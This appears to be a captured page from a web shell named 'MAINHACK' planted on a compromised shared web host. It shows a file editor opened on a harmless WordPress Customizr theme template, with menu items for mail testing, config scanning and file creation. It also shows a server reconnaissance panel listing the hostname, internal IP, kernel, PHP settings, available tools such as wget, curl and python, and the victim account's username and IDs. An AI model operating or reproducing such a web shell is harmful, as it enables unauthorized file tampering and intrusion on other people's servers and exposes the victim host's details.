[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: grid_wrapper.php
<?php /** * The template for displaying the grid item wrapper in lists of posts * * In WP loop * * @package Customizr * @since Customizr 3.5.0 */ /* Are we at the start of the loop? in this case print a section wrapper element */ if ( czr_fn_get_property( 'print_start_wrapper' ) ) : ?> <div id="<?php czr_fn_echo('element_id') ?>" class="grid-container grid-container__classic <?php czr_fn_echo('element_class') ?>" <?php czr_fn_echo('element_attributes') ?>> <div class="grid__wrapper grid"> <?php endif; /* Is the item we're about to display the first of a grid section (the expanded sticky is both a first and last of a grid section)*/ if ( czr_fn_get_property( 'is_first_of_grid' ) ) : ?> <section class="row <?php czr_fn_echo('grid_section_class') ?>"> <?php endif; czr_fn_render_template( 'modules/grid/grid_item', array( 'model_args' => czr_fn_get_property( 'grid_item' ) ) ); /* Is the item we're about to display the last of a grid section (the expanded sticky is both a first and last of a grid section)*/ if ( czr_fn_get_property( 'is_last_of_grid' ) ) : ?> </section> <?php endif; /* Close se section at the end of the loop */ if ( czr_fn_get_property( 'print_end_wrapper' ) ) : ?> </div> </div> <?php endif;
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129